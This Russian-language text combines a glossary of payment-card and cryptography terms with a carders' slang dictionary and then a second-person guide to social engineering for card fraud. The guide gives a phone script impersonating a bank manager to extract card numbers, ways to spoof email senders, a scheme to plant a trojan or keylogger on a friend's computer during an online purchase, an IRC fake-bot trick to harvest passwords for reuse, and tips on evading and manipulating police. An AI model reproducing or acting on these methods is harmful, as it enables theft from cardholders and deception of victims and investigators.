PIN (Personal Identification Number) – цифровой или алфавитно-цифровой код, доступный лишь владельцу карты. Используется при операциях с карточным счетом, привязанном к данной банковской карте.
POS Terminal (Point of Sale) – электронный прибор, используемый для авторизации и проведения платежей по банковской карте.
Post Authorization - транзакция, которой предшествует голосовая авторизация.
Prepaid card – smart-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты.
Prior Authorized Sale – транзакция, для которой сначала проводится авторизация. Продавец авторизует карту, прежде чем предоставить продукт/услугу.
Private Key – секретный ключ, доступ к которому должен иметь только его владелец. Секретному ключу соответствует открытый ключ.
Processor – процессор платежей, компьютерный центр, производящий операции по обработке платежей по банковским картам
Public Key - открытый ключ, несекретная часть пары двух ключей в асимметричной криптографии
Public Key Certificate –сертификат открытого ключа. Информация об открытом ключе, как правило, включающая сам ключ, подписанная цифровой подписью физического лица или организации. Сертификат защищает целостность ключа, если человек или организация, подписавшие его, хорошо известны, а их открытые ключи широко распространены.
Public Key Cryptography – схема шифрования, не требующая конфиденциального канала для установления конфиденциальной связи. Чтобы послать конфиденциальное сообщение, необходим только открытый ключ получателя, который расшифрует полученное сообщение своим секретным ключом.
Public Key Encryption – метод шифрования, разработанный с целью преодоления основного недостатка симметричной криптографии - необходимости иметь надежный канал для передачи ключа адресату.
Real-Time Processing - процесс обработки платежей в режиме реального времени, когда верификация и обработка карточного платежа, немедленно следует за покупкой. Верификация в реальном времени занимает обычно несколько десятков секунд.
Receipt – чек, содержащий описание покупки по банковской карте, обычно включает следующую информацию: дата, имя и адрес продавца, сумма, уникальный номер и код авторизации.
Recurring Fees – регулярные, обычно ежемесячные платежи за пользование Merchant Account. Включают Discount Rate, Transaction Fee, Statement Fee, и Monthly Minimum.
Recurring Transaction – периодическое снятие денег со счета покупателя, происходящее на основании договора, заключенного между покупателем и предприятием торговли/услуг.
Retrieval Request (Copy Request) – требование продавцу представить документацию о конкретной транзакции. Обычно поступает от банка-эмитента в спорных случаях, когда держатель карты оспаривает сделку.
Secure Server – безопасный сервер, позволяющий установить с браузером защищенное соединение по протоколу SSL или SET
Session Key - ключ для симметричного шифрования, который используется ограниченное время, чаще для одного защищенного соединения, например, по протоколу SSL.
SET (Secure Electronic Transaction) - система обеспечения безопасности оплаты по банковским картам, разработанная компанией VISA, MasterCard, Microsoft и несколькими ведущими банками, основанная на шифровании с открытым ключом информации, связанной с параметрами карты, и разделением информации между участниками транзакции таким образом, что ни один из участников расчетов не обладает информацией целиком. С помощью стандарта SET покупатель и продавец могут однозначно идентифицировать друг друга, обменявшись цифровыми SET-сертификатами.
Settlement (Draft Capture) – процесс завершения платежа, когда транзакции посылаются вместе с кодами авторизации процессору платежей для перевода денежных средств продавцу.
Setup Fee – единовременная плата, взимаемая за открытие номера идентификации предприятия торговли/услуг в платежной системе (Merchant Account)
Shopping Cart Program – электронная корзина. Приложение, запускаемое на Интернет-сайте, предназначенное для сбора данных о товаре/услуге, которые посетитель намерен приобрести.
SIC Code – код стандартной бизнес-классификации (Standard Industry Classification). Это четырехзначное число, определяющее тип деятельности.
Smart Card – пластиковая карта, внутри которой находится микропроцессор, способный производить вычисления. Smart-карта предназначена для осуществления платежных, а также операций идентификации.
SSL (Secure Socket Layer) – протокол защищенной связи через Интернет. Основой протокола SSL является метод двухключевой криптографии, использующий для аутентификации взаимодействующих сторон и формирования общего ключа шифрования сертификаты открытых ключей пользователей (клиента и сервера), заверенные цифровой подписью специальных сертификационных центров.Благодаря серверам, поддерживающим протокол SSL, пользователь, загружающий сайт, может быть уверен в трех основных моментах:
Сайт действительно принадлежит компании, которая установила SSL свидетельство.
Используя уникальный «ключ сессии», протокол SSL шифрует всю информацию, которой обмениваются Интернет-сайт и его пользователи Это гарантирует, как минимум, что передаваемые серверу данные не будут просмотрены или перехвачены третьими лицами.
Данные, передаваемые посредством протокола SSL, не могут быть частично утеряны или заменены.
Одним из показателей безопасной связи является адресная строка браузера, в которой при безопасном соединении адрес будет начинаться с https:// вместо обычного http://, с которого начинаются адреса страниц, незащищенных протоколом SSL.
Statement Fee – фиксированная периодическая плата за пользование Merchant Account'ом.
Surcharges – дополнительная плата за прием платежей по банковским картам.
Swipe Discount Rate – процент, взимаемый эквайрером с продавца за каждое снятие денежных средств с физически доступной продавцу банковской карты.
Swiped Card - карта, информация с которой автоматически вводится с использованием POS-терминала.
Symmetric Cryptography –симметричная криптография или криптография с закрытым ключом. Криптографический алгоритм, в котором для кодирования и декодирования используется один и тот же ключ.
Terminal Capture – разновидность приема карточных платежей, когда информация о транзакциях хранится на компьютере продавца, причем последний вручную формирует из них Batch и затем направляет его для оплаты.
Third Party Processor – фирма, не принадлежащая платежной ассоциации VISA или MasterCard, нанимаемая эквайрером для проведения авторизаций и оплаты по пластиковым картам.
Ticket Only – покупка, для которой используется голосовая авторизация.
Transaction – любое взаимодействие между покупателем и продавцом, влияющее на состояние карточного счета покупателя.
Transaction Fee – фиксированная плата, взимаемая с продавца за каждую покупку (обычно в дополнение к Discount Rate).
Transaction File (Vendor File) – файл, в который процессор платежей помещает все транзакции, проведенные за предыдущий день.
Transaction Log – транзакции, записанные в порядке совершения.
Voice Authorization – голосовая авторизация. Применяется, когда нет подходящего устройства для проведения авторизации, например, POS-терминала.
Void – отказ покупателя от оплаты после того, как успешно прошла авторизация, принадлежащей ему карты. Транзакции, помеченные как Void, не включаются в Batch и не предъявляются к дальнейшей оплате.
Кардеры (от англ. "card" - карта) - профессиональные преступники, специализирующиеся на незаконной деятельности в сфере оборота пластиковых карт и их электронных реквизитов.
СЛОВАРЬ ЖАРГОННЫХ СЛОВ И ВЫРАЖЕНИЙ КАРДЕРОВ
БИН (от "банковский идентификационный номер" - англ. "bank identification number (BIN)") - номер, состоящий из 4-х цифр и предназначенный для идентификации банков - эмитентов платежно-расчетных карт в платежной системе. Как правило, первые четыре цифры в номере банковской карты совпадают с БИН ее эмитента.
ВАЛИДНАЯ КАРТА (от англ. "VALID" - "имеющий силу") - действующая или действительная карта; неподдельная карта; идентификационные реквизиты действующей или неподдельной карты.
ВАЛИДНОСТЬ (от англ. "VALID THRU" - "имеет силу до…") - срок действия карты.
ВЕБМАНИ (web money, WM) - платежная система сети "Интернет" (используется для криминальных расчетов при покупке и продаже информации о реквизитах чужих карт, оказании консультационных кардерских услуг и др.); деньги, полученные от незаконной деятельности в сети "Интернет".
ВНЕДРЕНЕЦ - член организованной преступной группы из числа сотрудников мерчанта, эквайрера или эмитента.
ГЕНЕРАТОР (generator) - вредоносная программа для ЭВМ, осуществляющая генерацию цифровых идентификационных реквизитов (обычных и электронных) пластиковых карт (как правило, идентификационной пары).
ЖЕЛЕЗО - аппаратные средства ЭВМ; электронный терминал без программного обеспечения; оборудование для подделки пластиковых карт (персонализатор, принтер, эмбоссер, ламинатор и др.).
ИНФА (infa) - информация, сведения о чем-либо.
КАРДИНГ (carding) - противоправная деятельность в сфере оборота пластиковых карт и их номеров; совершение каких-либо конкретных действий над чужими пластиковыми картами или их номерами.
КАРТЫ (cardz) - платежно-расчетные карты.
КОД-ГРАББЕР - вредоносная программа для ЭВМ, подбирающая секретный ключ, пароль или код доступа к программному обеспечению электронного терминала либо базе данных мерчанта, эквайрера, эмитента для осуществления операции с использованием пластиковой карты или хищения конфиденциальных данных.
КОДЕР (coder) - техническое устройство для записи компьютерных данных (электронных реквизитов) на магнитную полосу карту.
КОДИНГ (coding) - запись компьютерных данных (электронных реквизитов) на магнитную полосу карты.
КОДЫ (codes, codez) - коды доступа к конфиденциальной информации базы данных виртуального магазина, банка-эквайрера или эмитента либо на охраняемый объект; ПИН-код; алгоритм "взлома" защиты от несанкционированного доступа к компьютерной информации или на охраняемый объект.
КОРДЕР (corder) - преступник, специализирующийся на подделке карт с магнитной полосой.
КРЕДА (creda) - кредитная или другая банковская карта либо информация о ней.
КРИПТ (cript) - криптографический алгоритм преобразования данных; программа генерации идентификационных пар и других цифровых идентификационных реквизитов банковских карт.
КРЯК - "взлом" средства защиты от несанкционированного доступа к конфиденциальной компьютерной информации, содержащейся на пластиковой карте либо клиентской базе данных виртуального магазина, банка-эквайрера или эмитента.
ЛАМЕР (LAMER, LAM3R) - держатель карты или клиент виртуального магазина - потенциальный потерпевший; начинающий кардер.
МЕРТВАЯ КАРТА - карта, не представляющая никакую ценность; карта, с помощью которой по каким-либо причинам нельзя осуществлять операции (находящаяся в розыске, заблокированная, операции по которой отслеживаются правоохранительными органами и т.п.); карта, которую нельзя подделать.
НОМЕР КРЕДЫ - любой идентификационный номер карты; идентификационная пара карты; электронный реквизит карты.
ОРДЕРИТЬ - заказывать товар в виртуальном магазине с использованием реквизитов банковской карты.
ОТМЫТЬ КАРТУ - перевести деньги с карты - со специального карточного счета на другой счет, пользуясь целой цепочкой промежуточных счетов и платежных систем; скрыть ("замести") следы перемещения похищенных денег.
ПАТЧ, ПАЧ (от англ. "patch" - заплата, заплатка) - изменение в электронном реквизите карты или программе для ЭВМ.
ПАТЧИТЬ, ПАЧИТЬ - вносить изменения в электронные реквизиты карты или программу для ЭВМ или.
ПЕРЕШИВАТЬ - изменять, перепрограммировать компьютерные данные (электронные реквизиты), содержащиеся на интегральной микросхеме карты.
ПИН (от англ. "personal identification number" (PIN) - "персональный идентификационный номер") - ПИН-код или PIN-код: секретный ключ электронной цифровой подписи, выдаваемый пользователю (держателю карты, абоненту) сети ЭВМ или электросвязи для его идентификации и предоставления доступа к компьютерной информации.
ПЛАСТИК (plastic), ПЛИТКА - реально существующая пластиковая карта.
ПРОВЕРКА НА ВАЛИДНОСТЬ - проверка на правильность подбора номера, идентификационной пары, ПИН-кода или электронного реквизита карты; проверка на то, принимает ли мерчант карту для проведения платежно-расчетной операции или нет.
ПРОКСИ-СЕРВЕР (от англ. "proxy-server" - "сервер, предоставляющий полномочия") - управляющая ЭВМ компьютерной сети (сервер), которая проводит автоматическую авторизацию пользователей (держателей карт или абонентов) по секретному ключу (ПИН-коду или паролю) и дает разрешение на доступ к компьютерной информации, а также работу с ней.
ПРОШИВА, ПРОШИВКА - программное обеспечение (набор программ для ЭВМ), хранящееся в памяти интегральной микросхемы.
ПРОШИТЬ - записать в память интегральной микросхемы какие-либо данные; тоже, что и "перешивать".
РЕАНИМАТОР (reanimator) - преступник, специализирующийся на подделке ("подзарядке") карт с фиксированной покупательной способностью.
CVC2/CVV2 - последние три цифры номера банковской карты, которые вычисляются по алгоритму криптографического преобразования данных DES с использованием секретного ключа банка - эмитента и устанавливают математическую зависимость номера карты от срока ее действия.
СИМА, СИМКА - SIM-карта.
СЛИТЬ С КАРТЫ - снять деньги с карты - со специального карточного счета или перевести их на другой (как правило, свой) банковский счет; совершить хищение денег с использованием чужой пластиковой карты или ее реквизитов.
ТРЕЙДИНГ (trading) - торговля, обмен похищенной конфиденциальной информацией о реквизитах пластиковых карт и их держателях. Например, "я тебе спам-лист на 3 млн. юзверей, а ты мне 10 валидных кред с cvv2".
ФЕЙКОВЫЙ МАГАЗИН - виртуальный лжемагазин, предназначенный для мошеннических операций с реквизитами банковских карт и персональными данными их держателей (по типу "фирм - однодневок").
ФРАУД (fraud) - незаконные операции, совершаемые с использованием пластиковых карт и их реквизитов.
ХАЧИТЬ, ОТХАЧИТЬ, ЗАХАЧИТЬ, ПРОХАЧИТЬ - осуществлять копирование, модификацию либо блокирование программы для ЭВМ, базы данных или конфиденциальной компьютерной информации.
ЭЛИТА (ELITE, ELYTE) - кардер - профессионал, "авторитет".
ЮЗВЕРИ, ЮЗЕРЫ (от англ. "to use" - пользователь) - держатели пластиковых карт; клиенты электронных платежных систем; пользователи сети ЭВМ "Интернет". Эмбоссер - устройство для выдавливания символов на карте.
Карт принтер - принтер для печати информации (картинки) на карте.
Трек (Дорога) - часть дампа с определенной информацией каждый. 1-ый трек - информация о владельце карты, 2-ой трек - информация о владельце карты, о банке выдавшем карту, и прочее, 3-ий трек - можно сказать, запасной, используется магазинами для начисления очков и прочего.
Дамп - информация, которая пишется на магнитную полосу карты, состоит из 1,2 или 3 треков.
Белый пластик - кусок чистого пластика, на который наносится информация.
акк (от англ. account) - счет.
биллинг (от англ. bill - счет)- платежный, платежная система.
ебэй, ебай - название аукциона eBay [и:'бэй].
мерчант (merchant) - торговый счет, система он-лайн торговли.
транзакция - сделка, проводка по счетам. дроп - общее название того, кто принимает "грязный" товар или деньги, бывают профессиональными (осознают что делают) или жертвами, которые не осознают того, что делают.
палка - система денежных переводов PayPal;
реальный пластик - поддельная кредитная карта, которую возможно использовать для покупок в реальных магазинах. Такая карта является своего рода дубликатом где-то реально существующей кредитной карты.
эноролл (от англ. enroll) - привязка кредитной картыбанковского счета к он-лайну, с возможностью изменять их данные через интернет.
юзать (от англ. use) - использовать.
Access Control Cards - Карта системы контроля доступа, Пропуск
Пластиковые карты, используемые для организации доступа в помещения, обычно выполняются в виде карт с магнитной полосой или бесконтактных смарт-карт.
Эквайр - Банк или иной финансовый институт, заключивший договор с торговой организацией на приём платёжных карт и ответственный за оплату счетов владельцев карт.
Authentication - Технология удостоверения личности в автоматизированной информационной системе
Authorization - Авторизация, требование оплаты. Блокирует деньги на счету, уменьшая свободную (Open to Buy) для покупок сумму. Чтобы снять деньги, необходимо завершить авторизацию, см. Settled. Если за время, которое определяется эмитентом (см. Issuer), авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для покупок
Batch - Набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день.
Batch можно завершить как автоматически, так и с помощью POS-терминала
BIN - Bank identification number (Банковский идентификационный номер) - уникальный номер, который присваивает банку платежная система на совершение операций по эмиссии и эквайрингу пластиковых карт.
Encoding - Кодирование
Процесс записи информации на магнитную полосу или микросхему памяти смарт-карты.
Factoring - Ситуация, когда собственный Merchant Account используется для приема за дополнительную плату платежей для другого продавца. Factoring считается нелегальной операцией. Чтобы легализовать Factoring, необходимы специальные юридические схемы, как, например, в CCNOW (www.ccnow.com).
Holdback - Часть средств, полученных продавцом от карточных платежей, блокируемая эквайером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу.
Слип - синоним слову чек применительно к карточным расчётам.
Чарджбек - опротестование банком кардхолдера снятия денег с его карты.
адалт, адульт (от англ. adult [эдалт]-взрослый)
1. сайт с содержанием только для взрослых, порно-сайт;
2. направление работы в кардинге.
акк (от англ. account) - счет.
аук - сокращ. от аукцион.
биллинг (от англ. bill - счет)- платежный, платежная система.
ебэй, ебай - название аукциона eBay [и:'бэй].
мерчант (merchant) - торговый счет, система он-лайн торговли.
cc, креда - кредитная карта.
ccv (сокр. от Credit Card Verifier) - дополнительный защитный код в кредитной карте.
дамп (dump) - информация с магнитной ленты или чипа кредитной карты.
Кардинг (термин впервые появился в рунете в начале 90х годов прошлого столетия
1. (юридическое определение) вид мошенничества с использованием пластиковых карт или информации которую они содержат. Как преступление относится к высоко-интеллектуальным или т.н "бело-воротничковым";
2. (экономико-политическое определение) добровольно- принудительное перераспределение денежных средств от банков стран с высокой концентрацией спекулятивного капитала к активным экономическим субъектам с высокой концентрацией интеллекта;
3. (филосовск. определение) ловкость ума и никакого мошенства.
транзакция - сделка, проводка по счетам.
холдер (holder - держатель) - настоящий владелец реальной кредитной карты.
дроп - общее название того, кто принимает "грязный" товар или деньги, бывают профессиональными (осознают что делают) или жертвами, которые не осознают того, что делают.
грязь, грязные деньги/товар - деньги или товар незаконное приобретение которых возможно проследить;
чистые либо "отмытые" товарденьги - деньги или товар незаконное приобретение которых проследить НЕвозможно;
картон, картофель - данные где-то реально существующей кредитной карты, которые используются кардером как правило только для транзакций через интернет;
нал - 1. наличные деньги; 2. процесс перевода денег из безналичной формы в наличные, обналичка; 3. см также "отмыв" .
налить - обналичивать;
отмыв - превращение "грязных" денег в "чистые", то есть такие, незаконное происхождение которых невозможно или крайне трудно отследить и доказать; обрыв связи денег с их незаконным происхождением.
палка - система денежных переводов PayPal;
реальный пластик - поддельная кредитная карта, которую возможно использовать для покупок в реальных магазинах. Такая карта является своего рода дубликатом где-то реально существующей кредитной карты.
спам - рассылка писем по электронной почте в неограниченных количествах.
сокс, сокс-прокси (англ. socks-proxy) - сервер-посредник между вашим компьютером и конечным серверомсайтом, используемый чтобы скрыть ваш IP-адрес.
шоппинг (от англ. shopping) - покупки или серия покупок в магазине.
эноролл (от англ. enroll) - привязка кредитной картыбанковского счета к он-лайну, с возможностью изменять их данные через интернет.
юзать (от англ. use) - использовать.
Некоторые часто встречаемые англ. сокращения
DL, driver lisence - удостоверение на право управления транспортным средством, водительские права
ID, identity document - удостоверение личности
DOB, date of birth - дата рождения
SSN, Social Security Number - государственный номер, который присваивается для каждого жителя США для целей налогообложения и учета движения денежных средств, в том числе и кред. истории
SIN - канадский аналог SSN
MMN, mother's maiden name - девичья фамилия матери
PIN, personal identification number - аналог пароля, состоит только из цифр и используется для авторизации.
Этот раздел кардерского искусства очень важен. Большинство взломов происходит не без помощи социальной инженерии, и именно она подчас определяет провал или успех операции. Собственно, для некоторых операций социальная инженерия – единственное, что нужно для их осуществления.
Социальная инженерия
Социальная инженерия (Social Engineering) - это наука, с помощью которой происходит управление людьми против их воли и желания. Она была изобретена фрикерами уже довольно давно: лет двадцать - тридцать назад. Кстати, очень известными специалистами СИ были Кевин Митник и Росско.
В этой статье будет использоваться толкование, относящееся исключительно к компьютерной безопасности. То есть сейчас СИ - это способ нелегального доступа к секретной или личной информации путем обмана людей. Неброско, зато ясно. Обычно цель атаки СИ одна - получить пароль, необходимый для доступа к какой-либо секретной базе данных, в последнее время целью СИ часто является номер кредитки незадачливого юзера.
Простейшая СИ атака делится на 3 фазы: диверсия, реклама, помощь. С диверсией все просто, кардер-хакер просто нарушает работу компьютера жертвы любым способом. Это может быть как банальный вирус на дискете или в письме, так и хорошая атака на хост из Сети. После того, как комп загнулся, наступает второй этап взлома: реклама. Здесь кардер информирует жертву всеми доступными средствами (бумажные объявления, общие друзья, ICQ, спам), что именно он сможет вернуть к жизни безвременно скончавшуюся ОС. И только следующим шагом становится непосредственно помощь. Под "помощью" кардеры понимают восстановление компьютера, в ходе которого происходит незаметное для юзера выманивание из него необходимой инфы. О способах помощи мы поговорим чуть ниже, а сейчас рассмотрим места, где обычно проводятся атаки класса СИ.
Знал бы, где упадешь...
Излюбленные орудия и способы кардеров, проводящих такие атаки, широко известны: телефоны, как обычные, так и сотовые, личные встречи с жертвой, письмо - обычное бумажное или послание по мылу, различные чаты в сети (ICQ, IRC, банальный web-chat). Дальше я постараюсь изложить основные тонкости каждого.
Телефон - средство кардера
Начнем, пожалуй, с самого старого, но и сейчас активно используемого способа: общение с жертвой по телефону.
Вот основные плюсы такого метода:
Достаточно высокая анонимность, особенно при использовании левой линии с антиАОНом или звонка с таксофона.
Высокая эффективность, которая объясняется возможностью представиться любым человеком, и, при наличии навыков, атакуемый не заметит подвоха.
Быстрые результаты - кардеру не нужно ждать, пока дойдет письмо или вернется инет, упавший из-за грозы. При использовании мобильника мы получаем полную свободу, что немаловажно в трудовые будни. На этом плюсы социальной инженерии с использованием телефона заканчиваются и начинаются отрицательные стороны.
Самая большая проблема – это твой голос, особенно если человек на другом конце провода хорошо знает того, за кого себя выдает взломщик (к примеру, менеджера банка Х). Встает необходимость смены голоса любыми способами. Если не получается подобрать тон, то атакующий часто пытается сослаться на болезнь (хотя я сомневаюсь, что здоровый еще час назад человек может вдруг заболеть ларингитом с полной потерей голоса). Дальше стоит проблема фона - в любой организации добиться абсолютной тишины невозможно, а особенно в банках (я так часто говорю про банки потому, что кардеры чаще выдают себя за высокопоставленных служащих банка атакуемого). И значит, если некто позвонит в разгар рабочего дня и в его "офисе" будет стоять гробовая тишина, то кардеру не поверят или заподозрят неладное. Значит, необходимо применить одну из следующих уловок: телефонный аппарат, генерирующий шум офиса, запись из реального рабочего офиса или трансляция посредством радиожучков из другой организации (выбирается предельно тщательно). С технической стороной этого способа мы познакомились, переходим к самому радикальному и опасному - личная встреча.
Connect on TET-a-TET!
У встречи с жертвой, так сказать, тет-а-тет есть как явные недостатки, так и явные преимущества. К недостаткам относится то, что кардера, возможно, запомнят, следовательно он должен найти время и очень тщательно подготовиться - начиная с одежды и заканчивая прической, все должно соответствовать имиджу делового респектабельного человека (вряд ли лохматый и небритый голодранец может внушить доверие). Как ты понимаешь, из этого следуют и проблемы с поведением - кардер должен контролировать свои эмоции и вести разговор на "правильном" языке, не используя сленга, эффект от которого прямо противоположный.
Расстояние также играет немаловажную роль - при атаке с помощью телефона взломщик может находиться за тысячи километров от жертвы и добиться результатов без проблем, а для встречи ему придется приехать в город атакуемого. Несмотря на эти недостатки, СИ во время личной встречи не спешит сдавать позиции, поскольку способ этот не лишен достоинств - во время общения кардер видит человека, а значит, легко поймет, верит он ему или нет. Это позволяет моментально корректировать тактику атаки. Профессиональные кардеры имеют в запасе множество мелких психологических приемов (с некоторыми можешь познакомиться во врезке), которые резко повышают эффективность их труда. А истинные гуру не только имеют за плечами психологическую подготовку, но и владеют приемами гипноза, что позволяет им добиться практически стопроцентной эффективности, не оставляя следов. Этот способ оправдывает себя, только если человек имеет немалый опыт убеждения людей или владеет спецподготовкой (тут рулят психологи и психиатры).
Дальше я расскажу тебе о способах, появившихся совсем недавно, но уже получивших немалое распространение. Открывает наш мини-обзор инет-средств СИ простая электронная почта. Именно с помощью посланий по e-mail проводятся многие атаки, направленные на получение не только твоей креды, но и личной инфы более интимного характера. Я бы сказал даже, что большинство таких атак проведено именно с помощью электронной почты, поскольку она позволяет без проблем обрабатывать несколько человек одновременно.
Сеть нам кардить и жить помогает
В сущности, такая атака довольно проста - кардер переписывается с жертвой с левого почтового ящика и пытается выудить нужную инфу. При всей простоте проведения, необходимо учитывать некоторые тонкости, связанные с почтовой программой и заголовками письма. Так, сначала следует узнать, каким почтовиком пользуется человек, за которого взломщик выдает себя. Для этого достаточно получить от жертвы любую мессагу и, заглянув в заголовки (в аутлуке – «свойства письма», в бате – «F9», а в kmail жми на V), выяснить значение поля X-Mailer. Еще надо постараться, чтобы заголовки письма не содержали инфы, которая может выдать атакующего с потрохами. И хотя обычные люди вряд ли станут проверять, откуда пришло письмо, страховка еще никому не мешала. Итак, основная проблема – IP-адрес отправителя мессаги. Именно с его помощью были пойманы первые начинающие кардеры. Для того чтобы не оказаться в их числе, при отправке своих посланий кардеры юзают один из следующих способов. Первый состоит в простой перенастройке своего почтовика на другое имя и другой сервак, лучше применить систему профилей для каждой жертвы, чтобы не лезть каждый раз в настройки. Второй способ также несложен - найти программу, которая позволяет самому заполнять служебные поля, но здесь кардер старается всеми способами получить доступ к реальному почтовому серверу подставляемого чела. А вот третий гарантирует очень высокую эффективность, правда, с некоторыми затратами мозговых ресурсов кардера. Для выполнения диверсии следует с помощью простого терминала (стандартный от виндов подойдет на 100%) подключиться к серверу SMTP на 25 порт и продиктовать все поля с терминала. Помогают также и проги, типа Anonymity Mailer, позволяющие отправлять почту от любого имени (например, [email protected]).
/dev/hands and /dev/mozg в бой!
Теперь перейдем к тому, как все-таки в реальной жизни используется СИ атака. Первый распространенный способ - это звонок по телефону, в результате которого происходит примерно такой диалог между кардером и жертвой:
- Кардер: Здравствуйте, это Василий Лохов?
- Жертва: Да.
- К: Я - Иван Иванов, менеджер отдела по работе с пластиковыми картами банка Ч. Вчера нам пришел запрос на перевод $1053 с вашего счета на счет интернет-магазина, который числится у нас в черном списке (больше воды и крутизны!). Наш банк очень беспокоится за своих клиентов, и поэтому просим подтвердить передачу денег.
- Ж: А… У… Я… Я ничего не покупал…
- К: Хм. Странная ситуация. Вы никому не сообщали номер своей кредитной карты?
- Ж: Нет.
- К: Тогда, возможно, это ошибка нашего программного обеспечения… только 3 дня назад перешли на новую версию (банк крут, шагает в ногу со временем). Назовите номер вашей карты и дату окончания действия, мы сверим и сообщим результат. Если это ошибка с нашей стороны, то ваш счет будет восстановлен.
- Ж: Сейчас-сейчас. 987654321 01/04.
- К: Спасибо, сейчас будет проведена проверка. В течение 2 часов не проводите платежных операций с пластиковой картой нашего банка. До свидания!
- Ж: До свидания.
После такого разговора крайне желательно позвонить и успокоить юзера, что все нормально, его счет цел и невредим. Если жертва - простак, то он не побежит в банк и не станет узнавать у менеджера Ивана Иванова об ошибках ПО. И через некоторое время с ужасом обнаружит опустошение лицевого счета. А если кардер понимает, что жертва очень подозрительна, то старается провести все покупки моментально, либо вообще никогда (если атакуемый узнает, что никакой ошибки не было и что Иван Иванов уже 3 дня греется на Канарах, он обязательно заблокирует карту).
А еще вот так...
Следующий способ был найден совершенно случайно. Его реализация не требует больших затрат, да и СИ тут не так уж много. Представь себе следующее: есть некий инет-магазин (пусть будет абсолютно любой, ломать мы его не будем), в этом магазине жертва покупает любой товар, и номер его креды у тебя! Как? Секрет фокуса прост: ты ставишь ему на машину троянца/логгер клавиатуры и, как только получаешь необходимый номер, уничтожаешь все следы. А задача социальной инженерии тут в том, чтобы любым способом упросить человека купить что-то именно в этом магазине по СВОЕЙ креде. На все вопросы отвечай, что твоя кредитка пуста, а не платишь... ну, хотя бы потому, что хочешь завести другую, или твоя подруга требует много наличных сразу (это проходит - проверено). И обязательно пообещай возместить (и возмести!) все денежные затраты, плюс угости пивом, чтобы снять с себя подозрения. Но при всей простоте существует маленькая загвоздка: если жертва не начнет сразу проводить операции с кредой, тебе будет трудновато найти номерок в куче введенных символов. Поэтому - сходи сам на страничку закупки товаров этого магазина, найди обязательные поля и запомни, по ним искать будет проще.
Пока ты ищешь жертву, я тебе расскажу еще об одном способе. Сейчас нашим местом действия являются IRC-каналы и сети. Если человек, которого ты хочешь подставить, пользуется иркой, то тебе все карты в руки, дерзай.
Ирка... Как много в этом слове для сердца кардера слилось
Для начала выясним пароль на IRC жертвы, точнее, его она нам сообщит сама. Подготовка минимальна: 2 запущенных IRC-клиента у тебя на компе, причем один бот, а второй любой ник (из-под него ты будешь инженерить), причем ник твой должен иметь права оператора канала, хотя бы временно. После этого начинается СИ атака на юзера/юзеров, которая состоит из того, что ты шепчешь (или на весь чат произносишь), что для получения операторских прав достаточно послать сообщение боту канала. Но тем, кто никогда не был оператором (чувствуешь подвох?) необходимо провести идентификацию своего IP и DNS. Для выполнения этой операции напиши /msg bot identify твой_ irc_пароль. Робот проведет все настройки и будет встречать тебя по паролю. А дальше необходимо подготовить отступление: ты всем или только оператору канала сообщаешь, что уходишь и, возможно, не появишься несколько дней по причине отъезда. Затем, слезно попрощавшись со всеми... закрываешь второй IRC-клиент. А первый, с ботом, не трогаешь. Осталось только ждать получения пароля юзера в чистом виде. Дальше, ведь ты сейчас робот, необходимо отправить уведомление об аутентификации. И только после этого можешь смело отсоединяться от канала. И дальше начинаешь пробовать этот пароль к другим IRC-каналам, местным web-чатам и даже к аське. Очень многие имеют только один пароль на множество личных ресурсов, объясняя это нежеланием запоминать много "ненужной" инфы. Ну что ж… пусть поплатятся! А дальше, используя найденный пароль, начинаешь проводить СИ атаку на знакомых жертвы, цель которой - все та же креда.
Чем все кончается
Еще я должен рассказать тебе о том, как может повести себя жертва во время и после проведения атаки. Обычно все проходит гладко, но кто предупрежден, тот вооружен.
Жертва, ничего не подозревая, попадается на твою диверсию. Тут даже комментарии излишни ;-). Ты просто наслаждаешься плодами атаки и особо ни о чем не задумываешься. Вся работа после нападения сводится лишь к периодической проверке, как идут дела у жертвы с кредой, и выяснению – а не заметил ли он проблем. Самый благоприятный для кардера вариант.
Атакуемый достаточно умен и не поддается на твои уловки. В такой ситуации перед кардером встает выбор: попробовать другие методы или отстать от этого чела. Если ты выбираешь второе, то сохрани с уже бывшей жертвой дружбу. А если ты воинственный индеец и не думаешь закапывать топор войны, то дерзай! Хотя трудности прибывают с каждым новым заходом, так как жертва видит, что к ее персоне ты проявляешь повышенное внимание. Еще раз повторяю, необходимо быть предельно осторожным при повторных атаках. Просто помни, что жадность фраера сгубила.
Владелец креды просек, что его очень хотят развести на креду, но никуда не обратился. Такой исход, конечно, плох, но не смертелен - твоей свободе ничто не угрожает, правда могут поползти слухи о твоей грязной политике. Это испортит твою репутацию, поэтому постарайся при первых же недовольных воплях жертвы среагировать и исправить все на месте. Можешь прикинуться дурачком, который ничего и никогда не замышлял. И успокаивай себя тем, что ничего еще не потеряно.
Бывший друг не просто понял, что его пытаются кинуть, но и обратился куда следует с заявлением (бывает, что у него там еще и друзья). Это уже не очень хорошо, хотя и до срока тоже пока далеко. Чтобы не приближать этот момент – будь законопослушен, не нарушай, просто помни – ты можешь быть под прицелом. Примерно через полгода можешь браться за старое, но уже с удвоенной осторожностью. А вот если к тебе уже приходили - завязывай с кардингом, у них кое-что существенное на тебя есть. И самое главное, никогда не расставайся с наукой СИ, даже на допросах. Главная причина гибели юных талантов на нарах проста: они забывают, что следователи тоже люди, пусть и замаскированные в форму. А значит, и к ним можно применить трюки кардера. Правда, в школах милиции тоже учат психологию, но кто же помнит, чему его учили в вузе?
Психологические трюки кардера!
Трюки, о которых я тебе расскажу, используются очень многими – кардерами, хакерами, психологами, менеджерами и прочими обманщиками. Уверен, что они помогут тебе не только во взломе, но и в личной жизни
.Если хочешь воздействовать на чувства человека - говори в левое ухо, на логику - в правое, но учти, что пропитое лицо, прочувствованно просящее номер креды, вряд ли добьется успеха!
Разговаривай с объектом на привычном для него языке. Так, если это простой человек, мало смыслящий в ИТ и, в частности, в кредах, не используй жаргон. Лучше пять раз объяснить свою мысль на его языке, зато тебя поймут, и не возникнет разрыва в беседе.
Лучше всего память работает между 8-12 часами утра и после 9 часов вечера, хуже всего - сразу после обеда.
Незаконченные действия (разговор, утверждение контракта, встреча) запоминаются в два раза лучше доведенных до конца.
Наука подсчитала, что человек говорит только 80% из того, что хочет сообщить, собеседники воспринимают 70% из этого, а понимают - 60%, запомнят от 10 до 25% всей инфы. Поэтому грузи и не жалей.
